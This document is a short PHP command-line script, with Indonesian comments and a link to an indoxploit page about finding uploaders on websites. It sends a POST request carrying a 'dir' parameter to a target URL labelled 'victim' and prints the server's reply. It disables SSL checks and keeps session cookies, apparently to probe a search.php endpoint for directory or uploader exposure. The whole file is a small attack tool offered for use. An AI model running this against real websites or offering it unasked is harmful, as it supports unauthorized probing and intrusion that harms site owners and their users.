index.php

1. <?php
2. // ini panggil pake cmd\terminal
3. // usage php index.php http://victim/search.php
4. // http://www.indoxploit.or.id/2016/06/how-to-found-uploader-in-website.html
5.  
6. if($argv[1]!=""){
7. $post = array( "dir" => "disini_dir",); // ganti
8.  
9.                
10.                     $ch2 = curl_init ("$argv[1]");
11.                     curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
12.                     curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
13.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
14.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
15.                     curl_setopt ($ch2, CURLOPT_POST, 1);
16.                     @curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
17.                     curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
18.                     curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
19.                     $data = curl_exec ($ch2);
20.                     echo $data."\n\n\n";
21.                 }
22.                 else{
23.                     echo "\n\nusage php $argv[0] http://victim/search.php\n\n";
24.                 }
25.                
26.                    
27. ?>